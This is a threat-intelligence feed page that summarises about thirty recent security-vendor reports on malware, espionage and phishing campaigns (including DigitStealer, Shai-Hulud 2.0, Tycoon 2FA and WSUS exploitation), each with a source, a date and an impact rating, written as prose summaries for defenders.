Source: https://www.zscaler.com/blogs/security-research/technical-analysis-matanbuchus-3-0#indicators-of-compromise--iocs-

Intel Source:: Polyswarm

Intel Name:: DigitStealer_MacOS_Infostealer

Date of Scan:: 2025-12-04

Impact:: HIGH

Summary:: Researchers at PolySwarm have uncovered a new macOS malware family named DigitStealer, a multi-stage information stealer that leverages JavaScript for Automation (JXA) and AppleScript to evade detection and exfiltrate sensitive data. The campaign distributes unsigned disk images masquerading as legitimate macOS utilities, using bash and curl commands to execute the payload entirely in memory. Once executed, the malware carries out comprehensive hardware, regional, and anti-virtualization checks to ensure it runs exclusively on physical Apple Silicon systems, with a particular focus on M2 and newer chips. DigitStealer advances through four structured stages, including an AppleScript-driven credential harvester, an obfuscated JXA module for broader data theft, a tampered Ledger Live component designed for cryptocurrency exfiltration, and a persistent backdoor established via a LaunchAgent.

Source: https://blog.polyswarm.io/digitstealer-macos-infostealer

Intel Source:: Seqrite

Intel Name:: Operation_DupeHike

Date of Scan:: 2025-12-03

Impact:: MEDIUM

Summary:: Researchers at Seqrite have uncovered an espionage campaign called Operation DupeHike, in which the threat group UNG0902 targets employees in Russian organizations, especially those working in HR, payroll, and internal administration. The attackers send a ZIP file containing a malicious shortcut file disguised as an internal bonus-policy document. When executed, it triggers a PowerShell downloader that retrieves a C++ implant named DUPERUNNER while showing the victim a legitimate-looking PDF to avoid suspicion. DUPERUNNER gathers system details, chooses a suitable process for injection, and then loads a stager that deploys an AdaptixC2 beacon directly in memory. This beacon uses encrypted HTTP communications, dynamic API resolution, custom hashing, and reflective loading to evade detection, while also collecting and exfiltrating local data to attacker infrastructure. The operation relies on user interaction and living-off-the-land techniques, making it more effective at bypassing basic security controls. The campaign has been active since at least November 2025 and conducting information theft rather than causing immediate disruption.

Source: https://www.seqrite.com/blog/9512-2/

Intel Source:: Any.Run

Intel Name:: Salty2FA_and_Tycoon2FA

Date of Scan:: 2025-12-03

Impact:: MEDIUM

Summary:: Researchers at ANY.RUN have identified a new hybrid phishing campaign that combines two well-known phishing-as-a-service kits: Salty2FA and Tycoon2FA. Although Salty2FA activity had recently declined, attackers are now integrating components from both toolkits within the same operation. The campaign uses Salty-style login and MFA pages on the front end, while captured data is routed to a Tycoon2FA-like backend. This hybrid design aims to steal enterprise login credentials and MFA codes, enabling attackers to compromise accounts and move deeper into networks. To maintain resilience, the phishing infrastructure relies on low-cost hosting, CDNs, and rapidly rotating domains that remain active even as defenders attempt to block them. For victims, the pages appear highly convincing, while obfuscated JavaScript performs anti-analysis checks, dynamically loads additional stages, and falls back to alternate servers if needed.

Source: https://any.run/cybersecurity-blog/salty2fa-tycoon2fa-hybrid-phishing-2025/

Intel Source:: Koi Security

Intel Name:: ShadyPanda_Malware_Campaign

Date of Scan:: 2025-12-03

Impact:: MEDIUM

Summary:: Koi Security has uncovered a long-running campaign by the threat actor ShadyPanda, which has been abusing Chrome and Edge extensions for years to conduct large-scale surveillance. The group compromises legitimate, highly rated extensions by delivering delayed malicious updates, causing users to unknowingly install the malware through normal auto-updates. Over time, their tools have evolved simple ad-fraud extensions to sophisticated spyware and browser-based backdoors capable of executing attacker-controlled code directly inside the browser. The latest payload runs hourly, provides full programmatic access to browser APIs, and can dynamically shift between ad fraud, credential theft, and corporate espionage. It gathers browsing history, search queries, interaction telemetry, and device fingerprints, and can intercept sessions and credentials using malicious service workers. Because the attack operates entirely within the browser, it effectively bypasses traditional endpoint and email security controls.

Source: https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign

Intel Source:: G-Data

Intel Name:: Arkanix_Stealer

Date of Scan:: 2025-12-02

Impact:: MEDIUM

Summary:: Researchers at G DATA have uncovered Arkanix, a new information-stealing malware being sold online for quick profit. The operators openly promote it on social platforms and distribute it as seemingly legitimate tools within gaming and social communities. The malware comes in two versions—one written in Python and another in C++. The Python version downloads its active payload from a remote server and can even spread itself by sending messages through chat platforms. Both versions steal a wide range of data, including browser passwords and sessions, cryptocurrency wallet information, VPN and Steam accounts, Wi-Fi details, Telegram data, screenshots, and general system information. The C++ build is more advanced and injects into Chromium-based browsers to bypass newer cookie protection features and extract encrypted data. Everything stolen is sent back to servers controlled by the attackers so the data can be quickly sold or used for account takeovers.

Source: https://www.gdatasoftware.com/blog/2025/12/38306-arkanix-stealer

Intel Source:: 360 Threat Intelligence Center

Intel Name:: APT_C_35_Targets_Pakistani_Agencies

Date of Scan:: 2025-12-02

Impact:: HIGH

Summary:: Researchers at 360 Threat Intelligence Center have observed that the South Asian APT group APT-C-35 (Brain Worm, also known as Donot) has launched a new campaign targeting government entities in Pakistan using a remote access Trojan (RAT) called ShadowAgent. The campaign begins with phishing emails containing ZIP attachments with decoy PDFs and executables disguised as PDF icons to deceive recipients into execution. Once executed, ShadowAgent decrypts its configuration from an internal resource segment, establishes persistence via a scheduled task, and collects host identifiers, usernames, and security product information before exfiltrating data to a remote server over HTTP/WebSocket. The C2 infrastructure allows remote command execution through JSON over WebSocket, supporting shell interaction, file transfer, and directory traversal. A related downloader, linked through previously used digital certificates, employs AES and Base64 encryption, stages persistence via system processes, and communicates with the same C2 framework. The campaign’s tactics, encryption methods, and reuse of code, certificates, and infrastructure clearly tie it to APT-C-35. Its focus on government institutions, use of themed decoys, and targeting defense and administrative data.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507603&idx=1&sn=af41be456f6393a24771846328e8d7f2&poc_token=HMJjLWmjkDO24TTMzmHt6KR5LQFHyZH1Pxh11B8p

Intel Source:: Nextron Systems

Intel Name:: Malicious_VS_Code_Extension_Used_in_Supply_Chain_Attack

Date of Scan:: 2025-12-01

Impact:: HIGH

Summary:: Researchers at Nextron Systems have analyzed a malicious Visual Studio Code extension impersonating 'Material Icon Theme' (version 5.29.1) contained two Rust-based implants targeting both Windows and macOS, activated immediately upon extension launch through a loader script crafted to resemble legitimate files. The implants employed an unconventional command-and-control technique by pulling encrypted instructions from a Solana blockchain wallet, a method previously observed in the GlassWorm campaign, before decoding the commands and retrieving a second-stage payload from a remote command server, with a Google Calendar event serving as a fallback delivery mechanism. These follow-on payloads consisted of AES-256-CBC–encrypted JavaScript blobs.

Source: https://www.nextron-systems.com/2025/11/29/analysis-of-the-rust-implants-found-in-the-malicious-vs-code-extension/

Intel Source:: CYFIRMA

Intel Name:: APT36_Launches_New_Linux_Espionage

Date of Scan:: 2025-12-01

Impact:: HIGH

Summary:: Researchers at CYFIRMA have identified a new APT36 (Transparent Tribe) cyber-espionage campaign targeting Indian government entities using Python-based ELF malware designed for Linux systems. The actor, associated with Pakistan, demonstrates growing technical maturity and dual-platform capability through tailored payloads for both Windows and Linux, including distributions commonly used in Indian government environments. The attack begins with spear-phishing emails delivering weaponized .desktop shortcut files disguised as legitimate documents, once executed, these files decode a hidden Base64 payload, display a benign decoy PDF, and download additional malicious components from attacker-controlled infrastructure. The retrieved payloads establish persistence via systemd user services and deploy a Python-compiled RAT capable of file exfiltration, remote shell execution, screenshot capture, and arbitrary Python code execution. Static analysis shows the RAT was built with PyInstaller and incorporates cross-platform C2 communications over HTTP POST, zip-based data exfiltration, hidden working directories, and self-destruct routines to erase forensic evidence.

Source: https://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/

Intel Source:: Fortinet

Intel Name:: ShadowV2_Targeting_IoT_Devices

Date of Scan:: 2025-11-30

Impact:: MEDIUM

Summary:: FortiGuard researchers have identified ShadowV2, a new Mirai-based botnet targeting publicly exposed IoT devices. The operators exploit several known vulnerabilities in DD-WRT, D-Link, and TP-Link firmware to gain remote code execution and deploy an initial downloader that subsequently retrieves the main ShadowV2 binary. Once executed, the malware initializes XOR-obfuscated configuration data containing file paths, HTTP headers, and user-agent strings designed to mimic legitimate web traffic. ShadowV2 supports UDP, TCP, and HTTP-based flooding techniques, with attack routines dynamically triggered using numeric method IDs issued by the C2 server. Ongoing activity shows widespread scanning and exploitation across the Americas, Europe, Africa, and Oceania, reflecting an effort to build a large, globally distributed botnet. Compromised devices can be used for high-volume DDoS attacks and may also function as proxies or entry points for lateral movement into internal networks.

Source: https://www.fortinet.com/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices

Intel Source:: Jamf

Intel Name:: FlexibleFerret_macOS_Job_Scam_Malware

Date of Scan:: 2025-11-30

Impact:: HIGH

Summary:: Researchers at Jamf Threat Labs have identified a renewed campaign involving the FlexibleFerret malware family, a macOS-targeting threat attributed to DPRK-aligned operators. The operation leverages fake job recruitment websites and LinkedIn posts to trick victims into running attacker-supplied Terminal commands during supposed hiring assessments. Once executed, these commands initiate a multi-stage infection chain that installs a malicious shell script and a Golang-based backdoor. The malware establishes persistence through LaunchAgents, deploys a decoy application mimicking Chrome to harvest credentials, and abuses legitimate APIs for exfiltration. The campaign demonstrates refined social engineering capabilities designed to bypass macOS Gatekeeper protections and blend into normal user behavior.

Source: https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt/

Intel Source:: Darktrace

Intel Name:: TAG_150_Modular_Loader_RAT_Campaign

Date of Scan:: 2025-11-29

Impact:: HIGH

Summary:: Researchers at Darktrace have identified an ongoing campaign operated by the TAG-150 group, a Malware-as-a-Service (MaaS) provider active since March 2025. TAG-150 employs two primary malware families, CastleLoader and CastleRAT, to deliver, stage, and execute malicious payloads across enterprise networks. CastleLoader functions as a modular loader, capable of downloading and executing secondary payloads via deceptive web domains and GitHub-hosted repositories, while CastleRAT operates as a remote access trojan enabling command execution, keylogging, and data theft. The campaign’s architecture demonstrates a deliberate separation between delivery and execution phases, enhancing operational resilience and evasion capabilities. Darktrace analysts observed TAG-150 leveraging multi-stage infection chains, including fake software update prompts and embedded shellcode, to compromise targets primarily within the United States.

Source: https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system

Intel Source:: Darktrace

Intel Name:: Black_Friday_Brand_Impersonation_Lures

Date of Scan:: 2025-11-29

Impact:: MEDIUM

Summary:: Darktrace researchers have observed a significant rise in sophisticated phishing campaigns during the Black Friday period, with attackers aggressively using brand impersonation and urgent promotional themes. These campaigns revolve around highly convincing emails that imitate major consumer and luxury brands to steal credentials or redirect victims to fraudulent sites. Threat actors leverage well-crafted subject lines about exclusive deals and limited-time offers to entice user. They also take advantage of newly registered domains and third-party hosting services to evade traditional email security and reputation-based filtering. The emails are carefully designed to mirror legitimate marketing communications, replicating real brand layouts, colour palettes, and call-to-action elements.

Source: https://www.darktrace.com/blog/from-amazon-to-louis-vuitton-how-darktrace-detects-black-friday-phishing-attacks

Intel Source:: Netskope

Intel Name:: Shai_Hulud_2_0

Date of Scan:: 2025-11-29

Impact:: MEDIUM

Summary:: Netspoke researchers have uncovered Shai-Hulud 2.0, an aggressive and automated npm supply-chain campaign that compromises developers’ GitHub accounts and tokens to mass-publish malicious packages. Once installed, the malware deploys multi-stage payloads that collect environment details, cloud secrets, and authentication material from developer workstations and CI pipelines. It then uses this access to backdoor GitHub workflows and npm projects, enabling lateral movement across organisations. Active since mid-September 2025, Shai-Hulud 2.0 has already infected hundreds of npm packages, with attackers continually pushing new trojanized versions even after maintainers attempt remediation. By stealing cloud secrets and local configuration data, the malware creates opportunities for further cloud account breaches and long-term persistence within GitHub organisations.

Source: https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed

Intel Source:: Seqrite

Intel Name:: Operation_Hanoi_Thief

Date of Scan:: 2025-11-29

Impact:: MEDIUM

Summary:: Seqrite Labs has identified a focused spear-phishing campaign, dubbed Operation Hanoi Thief, targeting Vietnamese IT professionals and recruitment teams. The attackers deliver a multi-stage info-stealer known as LOTUSHARVEST through a malicious ZIP file containing a résumé-themed LNK shortcut embedded within a pseudo-polyglot lure that also functions as a batch script. Once triggered, the LNK leverages Windows LOLBINs and a scripted execution chain to drop a malicious DLL and enable DLL sideloading via a copied ctfmon.exe. The final payload, tracked as LOTUSHARVEST, focused on browser data theft rather than encryption or destruction. The malware includes anti-analysis logic such as debugger checks and fake exception handling to evade sandboxing and reverse engineering. It targets Chromium-based, harvesting history and saved credentials from local SQLite databases and decrypting them with Windows APIs. The stolen data is packaged together with host identifiers in JSON format and exfiltrated over port 443 to attacker-controlled infrastructure via standard WinINet APIs.

Source: https://www.seqrite.com/blog/9479-2/

Intel Source:: Picus Security

Intel Name:: Fog_Ransomware_APT_Style_Double_Extortion

Date of Scan:: 2025-11-28

Impact:: HIGH

Summary:: Researchers at Picus Security have identified Fog ransomware as a rapidly evolving cyber threat that blends ransomware operations with espionage-style tactics typically seen in advanced persistent threat (APT) groups. Emerging in early 2024, the group initially targeted education and recreation sectors in the United States before expanding to high-value financial institutions in Asia by mid-2025. Fog employs a multi-stage attack lifecycle that includes exploitation of remote access vulnerabilities, credential theft, and phishing campaigns delivering malicious PowerShell loaders. Following initial access, the operators conduct extensive network reconnaissance, privilege escalation through driver-level exploits, and lateral movement using legitimate administration tools.

Source: https://www.picussecurity.com/resource/blog/fog-ransomware-2025-deep-dive-into-ttps

Intel Source:: Polyswarm

Intel Name:: ScoringMathTea_RAT_Targets_UAV_Defense_Contractors

Date of Scan:: 2025-11-28

Impact:: HIGH

Summary:: PolySwarm researchers have uncovered that North Korea’s Lazarus Group is deploying a previously undocumented C++ remote-access trojan (RAT) dubbed ScoringMathTea as part of an updated phase of Operation DreamJob, internally referred to as “Gotta Fly.” This campaign is designed to exfiltrate sensitive UAV-related technology from defense contractors supporting Ukraine. ScoringMathTea is a fully in-memory RAT that employs dynamic API loading, encrypted strings, reflective DLL injection, and other stealth techniques to evade detection. The malware communicates with its C2 servers over HTTP/S using TEA/XTEA-CBC encryption, spoofed browser identifiers, and fake HTML error pages to mimic legitimate web traffic. The tool demonstrates strong operational discipline, featuring runtime-only decryption, custom obfuscation layers, and API hashing. Overall, the discovery highlights Lazarus Group’s continued investment in stealthy, espionage-focused tooling designed for high-value intelligence collection.

Source: https://blog.polyswarm.io/lazarus-groups-scoringmathtea-rat

Intel Source:: Zscaler

Intel Name:: Water_Gamayun_Campaign

Date of Scan:: 2025-11-28

Impact:: HIGH

Summary:: Zscaler has identified a new Water Gamayun campaign that leverages a compromised BELAY Solutions webpage and a newly registered domain to deliver a RAR archive masquerading as a PDF. The operators exploit the MSC EvilTwin vulnerability (CVE-2025-26633) to inject malicious code into mmc.exe, using the trusted Windows binary to execute multiple concealed PowerShell stages. The attack chain employs layered obfuscation, password-protected payloads, and C#-based process-hiding techniques, ultimately deploying multi-stage backdoors and stealers such as SilentPrism, DarkWisp, EncryptHub, and Rhadamantys. The final loader, ItunesC.exe, is designed for persistence, credential theft, and further payload delivery.

Source: https://www.zscaler.com/blogs/security-research/water-gamayun-apt-attack

Intel Source:: Cyfirma

Intel Name:: Tycoon_2FA_AiTM_Phishing_as_a_Service

Date of Scan:: 2025-11-27

Impact:: HIGH

Summary:: Researchers at CYFIRMA have identified Tycoon 2FA as an advanced and rapidly expanding Phishing-as-a-Service (PhaaS) platform that leverages Adversary-in-the-Middle (AiTM) techniques to steal user credentials and bypass multi-factor authentication. First observed in 2023, Tycoon 2FA enables threat actors to intercept authentication tokens in real time by proxying victims’ login requests through attacker-controlled servers. The service offers subscription-based access to phishing kits that emulate legitimate login portals for Microsoft 365, Gmail, and Outlook, using CAPTCHA gates, realistic validation steps, and deceptive error screens to evade detection and prolong victim interaction. Tycoon 2FA incorporates JavaScript obfuscation, Unicode-based code hiding, and browser fingerprinting to complicate analysis and reduce detection by automated tools. Its infrastructure employs rotating subdomains, encrypted payloads, and cross-origin data exfiltration mechanisms, ensuring resilience against static blocking.

Source: https://www.cyfirma.com/research/tycoon-2fa-a-technical-analysis-of-its-adversary-in-the-middle-phishing-operation/

Intel Source:: Validin

Intel Name:: DPRK_Linked_Contagious_Interview_Campaign

Date of Scan:: 2025-11-27

Impact:: HIGH

Summary:: Researchers at Validin have uncovered a new DPRK-linked campaign known as Contagious Interview, which leverages a deceptive recruitment platform called Lenny to target U.S.-based AI researchers, developers, and cryptocurrency professionals. The threat actors created a polished SaaS-style hiring website that closely resembles a legitimate AI job portal, complete with realistic workflows and branding. When victims begin the interview process, the site executes a clipboard-hijacking script that injects a malicious PowerShell command masquerading as a routine Microsoft driver update. This triggers a multi-stage, ClickFix-style infection chain that retrieves and executes additional payloads through PowerShell and VBScript. The campaign is designed to harvest intelligence, gain unauthorized system access, and enable potential financial theft through compromised cryptocurrency platforms.

Source: https://www.validin.com/blog/inside_dprk_fake_job_platform/

Intel Source:: Wezard4u

Intel Name:: Kimsuky_Health_Checkup_Email_Malware

Date of Scan:: 2025-11-26

Impact:: HIGH

Summary:: Researchers at Dreaming Bluebird have identified a new phishing campaign attributed to the North Korean threat group Kimsuky, which leverages a malicious email attachment disguised as a health checkup guide. The infection begins when recipients open a compressed archive containing a fake PDF file that actually executes a JavaScript payload through Windows Script Host. This script decodes Base64-encoded content and stages secondary components to the ProgramData directory before invoking PowerShell commands for further payload execution. The second-stage DLL is run through rundll32.exe to maintain stealth and persistence. The malware employs AES-CBC encryption and Base64 encoding to secure its command-and-control communications, which are crafted to appear as legitimate Chrome browser traffic.

Source: https://wezard4u.tistory.com/429656

Intel Source:: Checkpoint

Intel Name:: Black_Friday_eCommerce_Fraud_Surge

Date of Scan:: 2025-11-26

Impact:: MEDIUM

Summary:: Researchers at Check Point have identified a major rise in fraudulent eCommerce activity ahead of Black Friday 2025, driven by a surge in fake shopping sites and brand impersonation schemes. Threat actors used bulk domain registration and templated website generation to create convincing storefronts designed to steal credentials and financial information. They found that roughly one in every eleven newly registered Black Friday–themed domains was malicious, often blending geographic and time-based keywords to appear legitimate while impersonating well-known retailers. Many sites copied logos, layouts, and product images, including stolen or watermarked photos, and several campaigns targeted consumers in specific regions and languages. Although no direct link to AI was confirmed, the team warned that generative AI could soon accelerate and refine these fraud operations. Analysts observed more than 1,500 new brand-impersonating domains in October 2025, reflecting a significant month-over-month increase.

Source: https://blog.checkpoint.com/research/the-black-friday-cyber-crime-economy-surge-in-fraudulent-domains-and-ecommerce-scams/

Intel Source:: CN-SEC

Intel Name:: Kimsuky_and_Lazarus_Coordinated_Campaign

Date of Scan:: 2025-11-26

Impact:: HIGH

Summary:: Purple Team researchers have uncovered that North Korean threat groups Kimsuky and Lazarus are conducting a coordinated campaign that blends espionage with financially motivated intrusions. Kimsuky initiates these operations using academic-themed phishing lures—such as fake conference invitations or collaboration requests which contain malicious HWP or MSC files that deliver the KLogEXE keylogger. This early-stage access allows the actors to profile victim systems and collect operational intelligence. Lazarus then leverages this intelligence to carry out follow-on attacks, deploying Node.js-based payloads, custom backdoors including FPSpy and InvisibleFerret, and exploiting the Windows zero-day CVE-2024-38193 to escalate privileges and steal cryptocurrency. Both groups operate on shared infrastructure, use domain-polling techniques to evade detection, and clean up artifacts to hide their tracks. Their joint campaign has targeted blockchain, diplomatic, and defense organizations in South Korea and across the international landscape.

Source: https://cn-sec.com/archives/4704912.html

Intel Source:: Darktrace

Intel Name:: Xillen_Stealer_v5_AI_Evasive_Infostealer

Date of Scan:: 2025-11-25

Impact:: HIGH

Summary:: Researchers at Darktrace have identified a new version of the Python-based infostealer Xillen Stealer v5, which introduces advanced capabilities to evade AI-based detection systems. The malware targets sensitive data such as credentials, cryptocurrency wallets, and cloud configuration information across Windows, browser, and containerized environments. Xillen Stealer v5 incorporates multiple sophisticated modules, including a Rust-based polymorphic engine, behavioral mimicry, and container persistence to resist both static and behavioral detection. Its “AITargetDetection” module is designed to prioritize high-value victims—such as crypto traders, executives, and users in financially lucrative regions—using a rule-based targeting model.

Source: https://www.darktrace.com/blog/xillen-stealer-updates-to-version-5-to-evade-ai-detection

Intel Source:: ASEC

Intel Name:: South_Korea_Spear_Phishing_Surge

Date of Scan:: 2025-11-25

Impact:: HIGH

Summary:: Researchers at AhnLab Security Emergency Response Center (ASEC) have identified a surge in Advanced Persistent Threat (APT) campaigns targeting South Korea during October 2025, primarily leveraging spear phishing as the initial intrusion method. The observed attacks distributed malicious LNK and JSE attachments masquerading as legitimate inter-Korean cooperation or government-related documents to compromise victims. Two primary delivery mechanisms were reported: Type A, which used compressed archives to deploy RAT malware such as XenoRAT and RokRAT via PowerShell and cloud storage APIs, and Type B, which leveraged malicious AutoIt scripts to maintain persistence and execute remote commands. These campaigns demonstrated advanced social engineering, often exploiting politically sensitive lures related to North Korea, human rights, and national policy, indicating an espionage-driven objective.

Source: https://asec.ahnlab.com/en/91177/

Intel Source:: ASEC

Intel Name:: Qilin_and_Omnipotent_Financial_Data_Breaches

Date of Scan:: 2025-11-25

Impact:: HIGH

Summary:: Researchers at AhnLab Security Emergency Response Center (ASEC) have identified two major cyber incidents in October 2025 impacting the global financial sector, involving large-scale data breaches and ransomware attacks. The first case involves a DarkForum actor known as omnipotent, who leaked a massive customer database belonging to an Indian life insurance company, marking one of the largest data exposures in the country's insurance industry. The breach contained extensive personal and financial details, posing significant risks of identity theft and fraud. The second incident centers on the Qilin ransomware group, also known as The Gentlemen, which targeted a Singapore-based financial IT service provider that supports hundreds of banks and FinTech companies across multiple continents. The attackers exfiltrated sensitive corporate data and attempted to extort the victim by threatening to publish the stolen information.

Source: https://asec.ahnlab.com/en/91174/

Intel Source:: ASEC

Intel Name:: ShadowPad_WSUS_RCE_Exploitation_Campaign

Date of Scan:: 2025-11-24

Impact:: HIGH

Summary:: Researchers at AhnLab Security Intelligence Center (ASEC) have identified an intrusion campaign leveraging a recently disclosed remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, to deliver the ShadowPad backdoor. The attackers exploited vulnerable WSUS servers to gain system-level access, employing PowerShell-based tools for initial compromise before deploying legitimate utilities such as certutil and curl to install the ShadowPad malware. ShadowPad, a modular backdoor linked to multiple Chinese state-sponsored APT groups, was executed through DLL sideloading to ensure stealth and persistence. The campaign demonstrates a rapid operational response to the public release of exploit code, indicating the threat actors’ advanced technical capability and resource coordination. Once established, ShadowPad enables remote command execution, data exfiltration, and long-term control of compromised systems.

Source: https://asec.ahnlab.com/en/91166/

Intel Source:: Orange Cyberdefense

Intel Name:: Pain_in_the_Mist_Navigating_DreamJob_Arsenal

Date of Scan:: 2025-11-24

Impact:: HIGH

Summary:: Researchers at Orange Cyberdefense have observed that in August 2025, their CyberSOC and CSIRT teams investigated an intrusion attributed with medium confidence to UNC2970, a North Korean threat cluster associated with Operation DreamJob. The attack targeting an Asian subsidiary of a European manufacturing firm through a WhatsApp lure impersonating a project manager job offer. The intrusion began with a ZIP file containing a malicious PDF, a legitimate SumatraPDF executable, and a DLL that was sideloaded when the PDF opened, triggering a BURNBOOK loader variant that decrypted and ran the MISTPEN backdoor in memory. Operators stayed active for roughly six hours, using compromised infrastructure for command and control while performing Active Directory enumeration, pass-the-hash movement, and deploying secondary payloads that led to a data collection module. The BURNBOOK sample aligned with earlier variants seen in 2024, functioning as a dropper and decryptor, while the MISTPEN variant showed overlap with previously documented loaders, using encrypted HTTP(S) communication, modular execution via defined opcodes, and built-in sleep routines. Both malware families relied heavily on sideloading legitimate software to avoid detection.

Source: https://www.orangecyberdefense.com/fileadmin/global/Blog/Navigating_Operation_DreamJob_s_arsenal_1.pdf

Intel Source:: Huntress

Intel Name:: An_Abuse_of_Velociraptor

Date of Scan:: 2025-11-24

Impact:: HIGH

Summary:: Huntress researchers have identified active exploitation of a recently patched remote code execution vulnerability (CVE-2025-59287) in Windows Server Update Services (WSUS), which attackers used to gain initial access to enterprise environments. After compromise, the threat actors deployed Velociraptor, a legitimate open-source DFIR framework, to establish C2 across compromised endpoints. The attackers distributed malicious MSI packages hosted on s3[.]wasabisys[.]com, using them to install and configure Velociraptor agents that beaconed back to their C2 server. Once operational, the agents were used to run PowerShell payloads, execute remote commands, and perform extensive system and network reconnaissance.

Source: https://www.huntress.com/blog/velociraptor-misuse-part-one-wsus-up

Intel Source:: Truesec

Intel Name:: Malicious_ConvertMate_PDF_Editor

Date of Scan:: 2025-11-24

Impact:: HIGH

Summary:: Truesec researchers have identified a significant increase in detections involving a trojanized version of the PDF editor “ConvertMate,” active since November 19, 2025. Although the installer initially appears legitimate and is downloaded from conmateapp.com, it exhibits clear malicious behavior after execution, including unauthorized command execution and the establishment of persistence mechanisms. Once launched, the program initiates outbound connections to several external domains and drops multiple artifacts—updating_files.zip, native.zip, UpdateRetriever.exe, and conmate_update.ps1—used to maintain ongoing communication with attacker infrastructure. Persistence is maintained through scheduled PowerShell scripts that trigger network callbacks every 24 hours. The binaries are signed by AMARYLLIS SIGNAL LTD, the same certificate authority associated to the earlier PDFEditor malware campaign, , indicating that this activity is likely an extension of that operation.

Source: https://www.truesec.com/hub/blog/reoccurring-use-of-highly-suspicious-pdf-editors-to-infiltrate-environments

Intel Source:: CyberArmor

Intel Name:: Autumn_Dragon_Espionage_Campaign

Date of Scan:: 2025-11-23

Impact:: HIGH

Summary:: Researchers at CyberArmor have identified an ongoing espionage campaign called Autumn Dragon, attributed with medium confidence to a China-nexus APT active since early 2025. The operation targeted government and media organizations across Indonesia, Singapore, the Philippines, Cambodia, and Laos, focusing on intelligence tied to South China Sea developments. Initial access came through spearphishing attachments exploiting CVE-2025-8088 in WinRAR, using a malicious archive that deployed a batch dropper masquerading as a Windows Defender update script. This dropper retrieved staged payloads from cloud storage and executed them through PowerShell. The intrusion chain involved four stages: a WinRAR-based dropper, a Telegram-enabled backdoor using a modified libcef.dll sideloaded via a legitimate OBS executable, a loader abusing Adobe Creative Cloud binaries to decrypt and run shellcode, and a final HTTPS backdoor communicating with attacker infrastructure. Commands such as systeminfo, tasklist, schtasks, and screenshot indicated hands-on-keyboard activity. The campaign relied on DLL sideloading, legitimate application binaries, geo-restricted infrastructure, and Telegram traffic to avoid detection.

Source: https://cdn.prod.website-files.com/68cd99b1bd96b42702f97a39/691bf999a544b31f93edb11d_b6dc80485a86c3eeaed906c7ecf0cd7b_Autumn%20Dragon_%20China-nexus%20APT%20Group%20Target%20South%20East%20Asia.pdf

Intel Source:: Gen Threat Labs

Intel Name:: Gamaredon_Lazarus_Joint_Ops

Date of Scan:: 2025-11-23

Impact:: HIGH

Summary:: Researchers at Gen Threat Labs have identified rare evidence of cross-country collaboration between Russia’s Gamaredon and North Korea’s Lazarus advanced persistent threat (APT) groups. The investigation began after internal monitoring systems detected suspicious overlap between both actors’ activities through a shared command-and-control infrastructure. Subsequent analysis confirmed that a server previously attributed to Gamaredon was later found hosting a Lazarus malware variant, suggesting operational coordination or deliberate infrastructure sharing. This marks a potential first in observed Russian–North Korean cyber collaboration, signaling a deeper alignment of geopolitical and digital strategies. Gamaredon’s focus on espionage and disruption in support of Russian military objectives, combined with Lazarus’s financially motivated operations tied to North Korea’s economic agenda, underscores a fusion of capability and intent across both regimes.

Source: https://www.gendigital.com/blog/insights/research/apt-cyber-alliances-2025

Data Pipeline Manager Flex Consumption (DPM Flex) Data Sheet

Data Pipeline Manager Flex Consumption (DPM Flex) Data Sheet

Data Pipeline Manager Flex Consumption (DPM Flex) Data Sheet

Data Pipeline Manager Flex Consumption (DPM Flex) Data Sheet

Threat Research Feed

Thank you!